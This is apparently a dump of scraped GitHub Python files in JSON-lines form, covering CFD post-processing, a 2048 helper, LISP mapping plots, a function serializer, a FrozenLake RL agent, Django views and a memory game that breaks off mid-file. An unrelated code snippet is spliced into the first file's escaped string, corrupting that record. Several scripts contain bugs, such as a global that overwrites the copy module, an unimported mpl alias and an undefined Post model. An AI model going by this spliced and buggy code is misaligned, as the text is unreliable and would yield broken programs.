= open(nomFic,'r')\n\n # lecture de ligne -> entetes\n fichier = fic.readlines()\n\n ligne = fichier [0]\n tLigne = ligne.split()\n mu=float(tLigne[0])\n rho=float(tLigne[1])\n h=float(tLigne[2])\n 
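# calcStopDateTime in the data-writer class above uses
# duration = (numSamples - 1) / fs because the first sample falls exactly on
# the start time, so N samples span N - 1 sampling intervals. A quick worked
# check at 512 Hz:
from datetime import datetime, timedelta

fs, num_samples = 512.0, 1024
start = datetime(2016, 3, 24, 8, 0, 0)
stop = start + timedelta(seconds=(num_samples - 1) / fs)
print(stop)   # 2016-03-24 08:00:01.998047 -- just under 2 s, as expected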
L=float(tLigne[3])\n\n fic.close()\n return mu,rho,h,L\n\n#fonction de recuperation de la colonne u+\ndef utau():\n # ouverture des fichiers\n nomFicUstar = 'u_tau.dat'\n\n ficUstar = open(nomFicUstar,'r')\n\n # lecture de ligne -> entetes\n fichier = ficUstar.readlines()\n\n #tant que la derniere ligne est vide\n while fichier[-1]==\"\" or fichier[-1]==\"\\n\":\n del fichier [-1]\n\n ligne = fichier [-1]\n tLigne = ligne.split()\n u=float(tLigne[3])\n ficUstar.close()\n return u\n\n\ndef ecritureFichier(u,nomFicData,nomFicData2,rho,mu):\n #ecriture du fichier pour gnuplot\n nomFic = 'courbe_kepsplus.dat'\n ficRead = open(nomFicData,'r')\n ficRead2 = open(nomFicData2,'r')\n fichier = open(nomFic, 'w')\n\n #recuperation des valeurs. attention on suppose que ficRead et ficRead2 ont la meme structure\n fin=False\n while not fin:\n ligne = ficRead.readline()\n ligne2 = ficRead2.readline()\n if not ligne:\n fin=True\n tLigne = ligne.split()\n tLigne2 = ligne2.split()\n if len(tLigne)>0:\n y=float(tLigne[0])\n yPlus=y*rho*float(u)/mu\n kPlus=float(tLigne[1])/(u*u)\n epsPlus=mu*float(tLigne2[1])/(rho*u*u*u*u)\n Ret=kPlus*kPlus/(epsPlus+1e-15)\n fmu=exp(-3.4/((1+Ret/50)*(1+Ret/50)))\n fichier.write(' %18.8f %18.8f %18.8f %18.8f\\n' % (yPlus,kPlus,epsPlus,fmu))\n\n fichier.close()\n ficRead.close()\n ficRead2.close()\n\nif __name__ == '__main__':\n\n parser = optparse.OptionParser()\n (options, args) = parser.parse_args()\n\n mu,rho,h,L = properties()\n\n #recuperation des donnees\n u = utau()\n\n nomFic = args[0]\n nomFic2 = args[1]\n #ecriture du fichier gnuplot\n ecritureFichier(u,nomFic,nomFic2,rho,mu)\n","repo_name":"cea-trust-platform/TrioCFD-code","sub_path":"share/Validation/Rapports_automatiques/Turbulence/RANS/Low_Reynolds/src/courbes_kepsplus.py","file_name":"courbes_kepsplus.py","file_ext":"py","file_size_in_byte":2219,"program_lang":"python","lang":"fr","doc_type":"code","stars":31,"dataset":"github-code","pt":"40"} +{"seq_id":"5172943484","text":"\"\"\"Basic MessageBus implementation.\"\"\"\nfrom dataclasses import dataclass, field\nfrom typing import Callable, DefaultDict, Type, TypeVar\n\nfrom . 
import email\nfrom .domain.events import Event, OutOfStock\n\nTEvent = TypeVar(\"TEvent\", bound=Event)\nHandler = Callable[[TEvent], None]\n\n\n@dataclass\nclass MessageBus:\n \"\"\"A message bus implementation.\"\"\"\n\n handlers: DefaultDict[Type[Event], list[Handler[Event]]] = field(\n default_factory=lambda: DefaultDict(list)\n )\n\n def handle(self, event: Event) -> None:\n \"\"\"Handle an incoming event.\"\"\"\n for handler in self.handlers[type(event)]:\n handler(event)\n\n def add_handler(self, event: Type[TEvent], handler: Handler[TEvent]) -> None:\n \"\"\"Add an event handler.\"\"\"\n self.handlers[event].append(handler) # type: ignore\n\n\ndef send_out_of_stock_notification(event: OutOfStock) -> None:\n \"\"\"Send a notification when an OutOfStock event happens.\"\"\"\n email.send_mail(\n \"stock@made.com\",\n f\"Out of stock for {event.sku}\",\n )\n","repo_name":"tarcisioe/cosmic","sub_path":"cosmic/messagebus.py","file_name":"messagebus.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9910894290","text":"'''Module contaning functions used to play 2048\r\nNkosi Gumede\r\n30 April 2014'''\r\n\r\nimport copy\r\n\r\ndef create_grid(grid):\r\n \"\"\"create a 4x4 grid\"\"\"\r\n for a in range(4):\r\n grid.append([0,0,0,0])\r\n \r\ndef print_grid (grid):\r\n \"\"\"print out a 4x4 grid in 5-width columns within a box\"\"\"\r\n times=4\r\n column=5\r\n print('+'+'-'*times*column+'+')\r\n for row in range(4): \r\n print(\"|\",end=\"\")\r\n for col in range(4):\r\n if grid[row][col]==0:\r\n grid[row][col]=\" \"\r\n print(\"{0:<5}\".format(grid[row][col]),end=\"\")\r\n else:\r\n print(\"{0:<5}\".format(grid[row][col]),end=\"\")\r\n print(\"|\")\r\n print('+'+'-'*times*column+'+')\r\n \r\ndef check_lost (grid):\r\n \"\"\"return True if there are no 0 values and no adjacent values that are equal; otherwise False\"\"\"\r\n for row in range(4):\r\n for col in range(4):\r\n if grid[row][col]==0:\r\n return False\r\n for row in range(4):\r\n for col in range(4):\r\n specific_grid=grid[row][col]\r\n if 0<=col+1<4:\r\n if specific_grid==grid[row][col+1]:\r\n return False\r\n if 0<col-1<4:\r\n if specific_grid==grid[row][col-1]:\r\n return False\r\n if 0<=row+1<4:\r\n if specific_grid==grid[row+1][col]:\r\n return False\r\n if 0<row-1<4:\r\n if specific_grid==grid[row-1][col]:\r\n return False\r\n \r\n return True\r\n \r\n \r\ndef check_won (grid):\r\n \"\"\"return True if a value>=32 is found in the grid; otherwise False\"\"\"\r\n for row in range(4):\r\n for col in range(4):\r\n if grid[row][col]>=32:\r\n return True\r\n return False\r\n \r\ndef copy_grid (grid):\r\n \"\"\"return a copy of the grid\"\"\"\r\n \r\n copied=copy.deepcopy(grid)\r\n return copied\r\n \r\ndef grid_equal (grid1, grid2):\r\n \"\"\"check if 2 grids are equal - return boolean value\"\"\"\r\n global copy\r\n global grid\r\n copy= grid1\r\n grid= grid2\r\n if copy ==grid:\r\n return True\r\n else:\r\n return False","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_7/gmdnko003/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6853537197","text":"import sys\nimport time\nimport re\nimport os\nimport csv\nimport glob\nimport numpy\nimport statistics\nimport datetime\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport matplotlib.dates as mdates\n#from 
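# In the 2048 helper module above, grid_equal declares `global copy` and then
# assigns copy = grid1, rebinding the imported copy module at module scope;
# any copy_grid call made afterwards would raise AttributeError on
# copy.deepcopy. Neither function needs globals at all:
import copy

def copy_grid(grid):
    """return a copy of the grid"""
    return copy.deepcopy(grid)

def grid_equal(grid1, grid2):
    """check if 2 grids are equal - return boolean value"""
    return grid1 == grid2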
matplotlib.legend_handler import HandlerLine2D\n#from statsmodels.distributions.empirical_distribution import ECDF\nfrom measurements import results_from_lispmon\nfrom config.config import *\n\n# Parameters to Set\nmap_resolvers = ['217.8.97.6', '217.8.98.42' , '193.162.145.50' , '149.20.48.61' , '149.20.48.77' , '206.223.132.89' , '202.214.86.252' , '202.51.247.10'] # 3*EURO\nstart_date = '20160818'\nend_date = '20160920'\nHour = 12\n\n# Obtaining the Timestamps\nTSPs = []\ntable = open('../Tables/' + map_resolvers[0] + '-LISP-#RLOCs.csv', 'r')\nreader = csv.reader(table)\nfor row in reader:\n del row[0]\n for TSP in row:\n Date = datetime.datetime.fromtimestamp(int(TSP))\n Date.timestamp()\n Date_str = str(Date.year)+str('%02d'%Date.month)+str('%02d'%Date.day)\n if int(start_date) <= int(Date_str) <= int(end_date) and Date.hour == 12:\n TSPs.append(datetime.datetime.fromtimestamp(int(TSP)))\n break\n\n# Obtainning the Information from '-LISP.csv'\nmapping_lists = []\nfor map_resolver in map_resolvers:\n counter_TSP = 0\n mapping_list = []\n while counter_TSP < len(TSPs):\n print(counter_TSP)\n counter_RLOC = 0\n table = open('../Tables/' + map_resolver + '-LISP-#RLOCs.csv', 'r')\n reader = csv.reader(table)\n for row in reader:\n if row[0] == '':\n TSP_position = row.index(str(int(TSPs[counter_TSP].timestamp())))\n continue\n #del row[0]\n if row[TSP_position] != '' :\n counter_RLOC += int(row[TSP_position])\n counter_TSP +=1\n\n mapping_list.append(counter_RLOC)\n\n mapping_lists.append(mapping_list)\n\n\n# Getting the Number of LISP Reply from LISPmon\nmapping_list_LISPmon = results_from_lispmon.rloc_num_counter(start_date , end_date)\n\n\ndel mapping_list_LISPmon[5]\ndel TSPs[14]\ndel TSPs[15]\n\n# plot\n\ndates = matplotlib.dates.date2num(TSPs)\n\nplt.figure(figsize=(20, 9)) # adjust the size of the figure\n# Plot the LISP reply for Map resolvers\nfor x in range(0 , len(map_resolvers)) :\n del mapping_lists[x][14]\n del mapping_lists[x][15]\n plt.plot_date(dates, mapping_lists[x] , ls= '-' , marker='' , label = 'MR ' + str(x+1))\n\n#Plot the LISP Reply for LISPmon\nplt.plot_date(dates, mapping_list_LISPmon, ls='-', marker='' , label = 'LISPmon')\n\n#Setting\n\n# To automatically produce the size of the figure\nmpl.rcParams['text.usetex'] = True\nmpl.rcParams.update({'figure.autolayout': True})\nplt.grid(True)\nplt.axis([ min(dates) , max(dates) , 0 , 100 ])\nplt.xlabel('Time')\nplt.ylabel(' Number of RLOCs ')\nplt.legend( bbox_to_anchor=(1.01, 1.), loc=2, borderaxespad=0.)\nplt.gcf().autofmt_xdate()\n\n\ntry:\n os.stat(os.path.join(FIGURE_PATH))\nexcept:\n os.makedirs(os.path.join(FIGURE_PATH))\nplt.savefig(os.path.join(FIGURE_PATH, 'Mapping_RLOCs.eps'), dpi=300,transparent=True) # you can change the name, just an example\nplt.show() # When you use the above command to save the figure, you can choose to don't show the figure anymore\n\nsys.exit()","repo_name":"SeleneLI/LISP-Views","sub_path":"plot/mapping_RLOCs_figure.py","file_name":"mapping_RLOCs_figure.py","file_ext":"py","file_size_in_byte":3210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1152082197","text":"import matplotlib.pyplot as plt\n\nimport distributions as dist\n\n\ndef wheel_spin(bet: float, variable: dist.Variable) -> float:\n return bet * 2 * variable.trial()\n\n\ndef main() -> list:\n variable = dist.Bernoulli(0.75)\n bank = 100\n seq = [bank]\n iterations = 100\n for n in range(1, iterations):\n bet = 2 / 3 * bank\n bank -= bet\n bank += 
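# The settings block in the plotting script above calls mpl.rcParams, but the
# script only imports matplotlib under its full name, so `mpl` is undefined and
# those two lines raise NameError. The intended alias was presumably:
import matplotlib as mpl

mpl.rcParams['text.usetex'] = True
mpl.rcParams.update({'figure.autolayout': True})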
(wheel_spin(bet, variable))\n seq.append(bank)\n plt.scatter([i for i in range(iterations)], seq)\n plt.xlabel(\"value\")\n plt.ylabel(\"name\")\n plt.title(\"simulation\")\n plt.show()\n return seq\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ltptnt/StatSite","sub_path":"statVisualiser/util/wheelspin.py","file_name":"wheelspin.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"74579312440","text":"\t\ndef getExecutableName(fileName):\n\texecutableName = \"\"\n\tfor i in range(0,len(fileName)):\n\n\t\tif fileName[i] == \".\":\n\t\t\tbreak\n\t\texecutableName = executableName + fileName[i]\n\t\t\n\treturn executableName\n\ndef removeFileNameFromPath(filePath,fileName):\n\tfilePath = list(filePath)\n\tnewFilePath = \"\" \n\tfor i in range( len(filePath) - 1, len(filePath) - len(fileName) - 1 , -1):\n\t\tif filePath[i] != \"/\":\n\t\t\tfilePath[i] = \"\"\n\t\tfilePath[i - 1] = \"\"\n\n\tfor i in range(0,len(filePath)):\n\t\tif filePath[i] != \"\":\n\t\t\tnewFilePath = newFilePath + filePath[i]\n\t\n\treturn newFilePath\n\ndef listToString(string):\n\tli = list(string.split(\"/\")) \n\treturn li\n\n\ndef getFileNameFromPath(filePath):\n\tfileName = \"\"\n\tfPath = filePath\n\tfPathLst = listToString(fPath)\n\n\t#print(\"\\nfPathLst = \" + str(fPathLst))\n\tfPathLength = len(fPathLst)\n\tfileName = str(fPathLst[fPathLength - 1])\n\t#print(\"\\nfileName = \" + fileName)\n\treturn fileName\n#print(removeFileNameFromPath(\"home/saswat/CUDA-Image-Encryption/src/make_serial.mk\",\"make_serial.mk\"))\n#print((getExecutableName(\"def.mk\")))\n#print(getFileNameFromPath(\"/s/abcd.mk\"))\n#print(getExecutableName(\"abc.mk\"))\n\n\n\n","repo_name":"LuisAlexisSalazar/ParalelasGrupoFelipexFinal","sub_path":"basics.py","file_name":"basics.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"5910385528","text":"import inspect\nimport json\nimport types\n\nfrom CustomSerializer.task.my_parser import parse_loads, parse_dumps\n\nATTRIBUTES = [\n \"__code__\",\n \"__name__\",\n \"__defaults__\",\n \"__closure__\",\n]\n\n\ndef to_object(d, cls):\n obj = cls()\n for elem in d:\n setattr(obj, elem, d[elem])\n return obj\n\n\ndef serialize_obj(obj) -> dict:\n if obj is None:\n return None\n if isinstance(obj, (int, float, bool, str)):\n return obj\n if isinstance(obj, bytes):\n return list(obj)\n if isinstance(obj, (list, tuple)):\n lst = []\n for elem in obj:\n lst.append(serialize_obj(elem))\n return lst\n if type(obj) == dict:\n dct = {}\n for key in obj:\n dct[key] = serialize_obj(obj[key])\n return dct\n if inspect.isroutine(obj):\n return serialize_function(obj)\n dct = {}\n for key, val in inspect.getmembers(obj):\n if callable(val):\n if not \"__\" in val.__name__:\n dct[key] = serialize_function(val)\n else:\n dct[key] = serialize_obj(val)\n return dct\n\n\ndef serialize_function(f: object) -> dict:\n d = {}\n for mem, val in inspect.getmembers(f):\n if mem in ATTRIBUTES:\n d[mem] = serialize_obj(val)\n if mem == \"__code__\":\n d[\"__globals__\"] = {}\n glob = f.__globals__\n for name in val.co_names:\n if name == f.__name__:\n d[\"__globals__\"][name] = f.__name__\n elif not inspect.isbuiltin(name):\n if name in glob:\n if not inspect.ismodule(glob[name]):\n d[\"__globals__\"][name] = serialize_obj(glob[name])\n\n return d\n\n\ndef deserialize_co_consts(cc: list):\n lst = []\n for elem in 
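# The character loops in basics.py above re-implement standard path handling;
# os.path covers all three helpers directly (splitext differs only for names
# with several dots, where it splits at the last one rather than the first):
import os.path

def get_executable_name(file_name):          # "abc.mk" -> "abc"
    return os.path.splitext(file_name)[0]

def remove_file_name_from_path(file_path):   # drops the trailing "/name"
    return os.path.dirname(file_path)

def get_file_name_from_path(file_path):      # "/s/abcd.mk" -> "abcd.mk"
    return os.path.basename(file_path)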
cc:\n if type(elem) == dict and \"co_code\" in elem:\n lst.append(deserialize_codeobject(elem))\n else:\n lst.append(elem)\n return tuple(lst)\n\n\ndef deserialize_codeobject(code: dict):\n return types.CodeType(\n code['co_argcount'],\n code['co_posonlyargcount'],\n code['co_kwonlyargcount'],\n code['co_nlocals'],\n code['co_stacksize'],\n code['co_flags'],\n bytes(code['co_code']),\n deserialize_co_consts(code['co_consts']),\n tuple(code['co_names']),\n tuple(code['co_varnames']),\n code['co_filename'],\n code['co_name'],\n code['co_firstlineno'],\n bytes(code['co_lnotab']),\n tuple(code['co_freevars']),\n tuple(code['co_cellvars'])\n )\n\n\ndef deserialize_function(f: dict):\n code = f[\"__code__\"]\n details = [deserialize_codeobject(code)]\n\n globs = {\"__builtins__\": __builtins__}\n for elem in f[\"__globals__\"]:\n val = f[\"__globals__\"][elem]\n if type(val) == dict and \"__code__\" in val:\n globs[elem] = deserialize_function(val)\n else:\n globs[elem] = val\n details.append(globs)\n\n for attr in ATTRIBUTES:\n if attr != \"__code__\":\n details.append(f[attr])\n\n result_func = types.FunctionType(*details)\n\n result_func.__globals__[result_func.__name__] = result_func\n\n return result_func\n\n\ndef function_dumps(func) -> str:\n dct = serialize_obj(func)\n return parse_dumps(dct)\n\n\ndef function_dump(func, fp: str):\n s = function_dumps(func)\n f = open(fp, \"w\")\n f.write(s)\n f.close()\n\n\ndef function_loads(s: str) -> object:\n dct = parse_loads(s)\n func = deserialize_function(dct)\n return func\n\n\ndef function_load(fp: str):\n f = open(fp, \"r\")\n s = f.read()\n f.close()\n return function_loads(s)\n","repo_name":"WinterInside1/ISP","sub_path":"Lab2_test/CustomSerializer/task/func_serializer.py","file_name":"func_serializer.py","file_ext":"py","file_size_in_byte":3654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7502663717","text":"while True:\r\n a = input(\"Please enter first number: \")\r\n b = input(\"Please enter second number: \")\r\n\r\n try:\r\n c = int(a) + int(b)\r\n print(c)\r\n except ValueError:\r\n print(\"These are not integers!\")\r\n except Exception as e:\r\n print(str(e))\r\n finally:\r\n print(\"Introduce numbers!\")\r\n","repo_name":"adrianaroxana/Python-Basics","sub_path":"calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23494684129","text":"import machine\r\nsda=machine.Pin(0)\r\nscl=machine.Pin(1)\r\n\r\ni2c=machine.I2C(0, sda=sda, scl=scl, freq=400000)\r\naddresses = i2c.scan()\r\ncount = 1\r\nfor address in addresses:\r\n print(count, \" I2C address: \", hex(address))\r\n count+=1","repo_name":"kguilly/BrainControlledWheelchair","sub_path":"Hardware/tests code/I2C/iictest.py","file_name":"iictest.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71079189881","text":"import gym\nfrom collections import namedtuple\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.utils.tensorboard import SummaryWriter\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n# device = torch.device(\"cpu\")\n\nHIDDEN_SIZE = 128\nBATCH_SIZE = 200\nPERCENTILE = 70\nGAMMA = 0.90\n\n\nclass DiscreteOneHotWrapper(gym.ObservationWrapper):\n def __init__(self, env):\n 
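# A round-trip sketch for the function serializer above: dump a function (its
# code object, defaults, closure and referenced globals) to the custom string
# format, then rebuild a live callable from it. Assumes the surrounding
# CustomSerializer module and its my_parser backend are importable as shown:
def square_plus_one(x):
    return x * x + 1

payload = function_dumps(square_plus_one)
restored = function_loads(payload)
assert restored(3) == 10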
super().__init__(env)\n assert (env.observation_space, gym.spaces.Box)\n self.observation_space = gym.spaces.Box(\n 0.0, 1.0, (env.observation_space.n,), dtype=np.float32\n )\n\n def observation(self, observation):\n res = np.copy(self.observation_space.low)\n res[observation] = 1.0\n return res\n\n\nclass Net(nn.Module):\n def __init__(self, obs_size, hidden_size, n_actions):\n super().__init__()\n self.net = nn.Sequential(\n nn.Linear(obs_size, hidden_size),\n nn.ReLU(),\n nn.Linear(hidden_size, n_actions),\n )\n\n def forward(self, x):\n return self.net(x)\n\n\nEpisode = namedtuple(\"Episode\", field_names=[\"reward\", \"steps\"])\nEpisodeStep = namedtuple(\"EpisodeStep\", field_names=[\"observation\", \"act\"])\n\n\ndef iterate_batches(env, net, batch_size):\n batch = []\n episode_reward = 0.0\n episode_steps = []\n obs = env.reset()\n sm = nn.Softmax(dim=1)\n\n while True:\n obs_v = torch.FloatTensor([obs]).to(device)\n act_probs_v = sm(net(obs_v))\n action = torch.multinomial(act_probs_v, 1).item()\n\n next_obs, rewa, is_done, _ = env.step(action)\n\n episode_steps.append(EpisodeStep(observation=obs, act=action))\n\n if is_done:\n batch.append(\n Episode(\n reward=rewa * (GAMMA ** len(episode_steps)), steps=episode_steps\n )\n )\n episode_steps = []\n next_obs = env.reset()\n if len(batch) == batch_size:\n yield batch\n batch = []\n obs = next_obs\n\n\ndef filter_batch(batch, percentile):\n rewards = [episode.reward for episode in batch]\n\n reward_bound = np.percentile(rewards, percentile)\n\n train_obs = []\n train_act = []\n elite_batch = []\n\n for episode in batch:\n if episode.reward > reward_bound:\n train_obs.extend([step.observation for step in episode.steps])\n train_act.extend([step.act for step in episode.steps])\n elite_batch.append(episode)\n\n train_obs_v = torch.FloatTensor(train_obs)\n train_act_v = torch.LongTensor(train_act)\n\n return elite_batch, train_obs_v, train_act_v, reward_bound\n\n\nif __name__ == \"__main__\":\n env = gym.make(\"FrozenLake-v0\")\n env = DiscreteOneHotWrapper(env)\n\n # env = gym.wrappers.Monitor(env, directory=\"mon\", force=True)\n obs_size = env.observation_space.shape[0]\n n_actions = env.action_space.n\n\n net = Net(obs_size, HIDDEN_SIZE, n_actions).to(device)\n objective = nn.CrossEntropyLoss()\n optimizer = optim.Adam(net.parameters(), lr=0.01)\n writer = SummaryWriter(comment=\"-frozen_lake\")\n\n full_batch = []\n\n for iter_no, batch in enumerate(iterate_batches(env, net, BATCH_SIZE)):\n\n reward_mean = float(np.mean([episode.reward for episode in batch]))\n\n full_batch, obs_v, acts_v, reward_b = filter_batch(\n full_batch + batch, PERCENTILE\n )\n\n if not full_batch:\n continue\n\n full_batch = full_batch[-500:]\n\n action_scores_v = net(obs_v.to(device))\n\n loss_v = objective(action_scores_v, acts_v.to(device))\n\n optimizer.zero_grad()\n loss_v.backward()\n\n optimizer.step()\n print(\n \"{:d} loss={:.3f}, reward_mean={:.3f}, reward_bound={:.3f}, batch {:d}\".format(\n iter_no, loss_v.item(), reward_mean, reward_b, len(full_batch)\n )\n )\n writer.add_scalar(\"loss\", loss_v.item(), iter_no)\n writer.add_scalar(\"reward_bound\", reward_b, iter_no)\n writer.add_scalar(\"reward_mean\", reward_mean, iter_no)\n if reward_mean > 0.7:\n print(\"Solved!\")\n break\n writer.close()\n\n","repo_name":"amareyah/Reinforcement_Learning","sub_path":"code/frozen_lake.py","file_name":"frozen_lake.py","file_ext":"py","file_size_in_byte":4202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} 
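# DiscreteOneHotWrapper above turns FrozenLake's integer state into a one-hot
# vector: on the 4x4 map (16 states), observing state 3 yields a length-16
# float32 vector with a single 1.0 at index 3. Note also that the assert in
# __init__ builds a two-element tuple, which is always truthy; an isinstance
# check was probably intended:
#     assert isinstance(env.observation_space, gym.spaces.Discrete)
import numpy as np

obs_size, state = 16, 3
one_hot = np.zeros(obs_size, dtype=np.float32)
one_hot[state] = 1.0    # [0., 0., 0., 1., 0., ..., 0.]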
+{"seq_id":"40901690329","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.views.decorators.http import require_GET, require_POST, require_http_methods\nfrom django.http import JsonResponse\nfrom django.core.paginator import Paginator\nfrom .models import Article, Comment\nfrom .forms import ArticleForm, CommentForm\nfrom django.contrib.auth.decorators import login_required\n\n\ndef index_search(request):\n qs = Post.objects.all().order_by('-id')\n\n q = request.GET.get('q', '')\n if q: \n qs = qs.filter(title__icontains=q)\n paginator = Paginator(qs, 10)\n page_number = request.GET.get('page')\n page_obj = paginator.get_page(page_number)\n\n context = {\n 'articles' : qs,\n 'q' : q,\n 'page_obj' : page_obj,\n }\n\n return render(request, 'community/index.html', context)\n\n\ndef pur_index(request, article_pk):\n if int(article_pk) > 3:\n return redirect('community:index')\n articles = Article.objects.filter(purpose=article_pk).order_by('-id')\n paginator = Paginator(articles, 10)\n page_number = request.GET.get('page')\n page_obj = paginator.get_page(page_number)\n context = {\n 'articles': articles,\n 'page_obj': page_obj,\n 'article_pk': article_pk,\n }\n return render(request, 'community/index.html', context)\n\n\n@require_GET\ndef index(request):\n articles = Article.objects.order_by('-pk')\n paginator = Paginator(articles, 10)\n page_number = request.GET.get('page')\n page_obj = paginator.get_page(page_number)\n context = {\n 'articles': articles,\n 'page_obj': page_obj,\n }\n\n return render(request, 'community/index.html', context)\n\n@require_http_methods(['GET', 'POST'])\ndef create(request):\n if request.method == 'POST':\n form = ArticleForm(request.POST) \n if form.is_valid():\n article = form.save(commit=False)\n article.user = request.user\n article.save()\n return redirect('community:detail', article.pk)\n else:\n form = ArticleForm()\n context = {\n 'form': form,\n }\n return render(request, 'community/create.html', context)\n\n@require_GET\ndef detail(request, article_pk):\n article = get_object_or_404(Article, pk=article_pk)\n comments = article.comment_set.all()\n comment_form = CommentForm()\n context = {\n 'article': article,\n 'comment_form': comment_form,\n 'comments': comments,\n }\n return render(request, 'community/detail.html', context)\n\n\n@require_POST\ndef delete(request, article_pk):\n if request.user.is_authenticated:\n article = get_object_or_404(Article, pk=article_pk)\n if request.user == article.user:\n article.delete()\n return redirect('community:index')\n return redirect('community:detail', article.pk)\n\n\n@require_POST\ndef create_comment(request, article_pk):\n article = get_object_or_404(Article, pk=article_pk)\n comment_form = CommentForm(request.POST)\n if comment_form.is_valid():\n comment = comment_form.save(commit=False)\n comment.article = article\n comment.user = request.user\n comment.save()\n return redirect('community:detail', article.pk)\n context = {\n 'comment_form': comment_form,\n 'article': article,\n 'comments': article.comment_set.all(),\n }\n return render(request, 'community/detail.html', context)\n\n\n\n@require_POST\ndef comments_delete(request, article_pk, comment_pk):\n if request.user.is_authenticated:\n comment = get_object_or_404(Comment, pk=comment_pk)\n if request.user == comment.user:\n comment.delete()\n return redirect('community:detail', article_pk)\n\n\n@login_required\n@require_http_methods(['GET', 'POST'])\ndef update(request, article_pk):\n # article = 
Article.objects.get(pk=pk)\n article = get_object_or_404(Article, pk=article_pk)\n # 수정하는 유저와, 게시글 작성 유저가 같은지 ?\n if request.user == article.user:\n if request.method == 'POST':\n form = ArticleForm(request.POST, instance=article)\n if form.is_valid():\n form.save()\n return redirect('community:detail', article.pk)\n else:\n form = ArticleForm(instance=article)\n else:\n return redirect('community:index')\n context = {\n 'form': form,\n 'article': article,\n }\n return render(request, 'community/update.html', context)\n\n\n","repo_name":"NoJeong/PROJECT","sub_path":"영화추천사이트/community/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35533679664","text":"\n###########\n# Imports #\n###########\n\ntry:\n import simplegui\nexcept ImportError:\n import SimpleGUICS2Pygame.simpleguics2pygame as simplegui\nimport simpleplot\nimport random\n\n#############\n# Variables #\n#############\n\nHEIGHT = 100\nWIDTH = 800\nCARD_HEIGHT = 100\nCARD_WIDTH = 50\nnumber_list = [] # list with the numbers\ndeck = []\nexposed = []\ncool = []\ncard_color = \"#006400\"\ntext_color = \"#006400\"\nTEXT_SIZE = 28 #px\nCARD_LINE_COLOR = \"#FF0000\"\nINIT_STATE = \"unflipped\"\nmoves = 0\n\n####################\n# Helper functions #\n####################\n\n# helper function to initialize globals\ndef init():\n global deck, number_list, card_color, text_color, exposed, cool, moves\n number_list = [range(1,9) for i in range(2)]\n number_list = number_list[0] + number_list[1]\n random.shuffle(number_list) # Everyday I'm shuffeling\n INIT_STATE = \"unflipped\"\n i = 0\n cool = []\n moves = 0\n\n while i < len(number_list):\n text_position = [((i * CARD_WIDTH) + (CARD_WIDTH / 2) -10), CARD_HEIGHT - 40]\n card = [([i*CARD_WIDTH, 0], [(i+1)*CARD_WIDTH, 0], [(i+1)*CARD_WIDTH, CARD_HEIGHT], [i*CARD_WIDTH, CARD_HEIGHT]), 1, CARD_LINE_COLOR, card_color, number_list[i], text_position, text_color, INIT_STATE]\n deck.append(card)\n i += 1\n\ndef checkcard():\n global deck, cool\n for card in deck:\n for c in cool:\n if c == card[4] and card[7] == \"flipped\":\n card[7] = \"exposed\"\n\ndef clean():\n global moves\n for card in deck:\n if card[7] == \"flipped\":\n card[7] = \"unflipped\"\n moves += 1\n\n############\n# Handlers #\n############\n\n# define event handlers\ndef mouseclick(pos):\n global exposed, cool\n for card in deck:\n if ((card[0][0][0] <= pos[0]) and (card[0][1][0] >= pos[0]) and (card[7] == \"unflipped\") and len(exposed) < 2):\n card[3] = \"#000000\"\n card[6] = \"#FFFFFF\"\n card[7] = \"flipped\"\n exposed.append(card[4])\n break\n\n if len(exposed) >= 2:\n exposed = []\n clean()\n break\n\n# cards are logically 50x100 pixels in size\ndef draw(canvas):\n global deck, exposed, cool, moves\n i = 0\n for card in deck:\n canvas.draw_polygon(deck[i][0], deck[i][1], deck[i][2], deck[i][3])\n if len(exposed) == 0:\n card[3] = \"#006400\"\n card[6] = \"#006400\"\n if card[7] == \"exposed\":\n card[3] = \"#000000\"\n card[6] = \"#FFFFFF\"\n canvas.draw_text(str(card[4]), card[5], TEXT_SIZE, card[6])\n i += 1\n\n if len(exposed) == 2 and exposed[0] == exposed[1]:\n cool.append(exposed[0])\n cool.append(exposed[1])\n exposed.pop()\n exposed.pop()\n moves += 1\n\n checkcard()\n l.set_text(\"Moves = \" + str(moves))\n\n######\n# UI #\n######\n\n# create frame and add a button and labels\nframe = simplegui.create_frame(\"Memory\", WIDTH, HEIGHT)\nframe.add_button(\"Restart\", 
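# index_search in the Django views module above filters Post.objects, but no
# Post model is imported or defined there -- only Article -- so the view raises
# NameError as written. A corrected sketch, assuming Article was the intended
# model (and handing the paginator the same filtered queryset):
def index_search(request):
    qs = Article.objects.all().order_by('-id')
    q = request.GET.get('q', '')
    if q:
        qs = qs.filter(title__icontains=q)
    paginator = Paginator(qs, 10)
    page_obj = paginator.get_page(request.GET.get('page'))
    context = {'articles': qs, 'q': q, 'page_obj': page_obj}
    return render(request, 'community/index.html', context)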
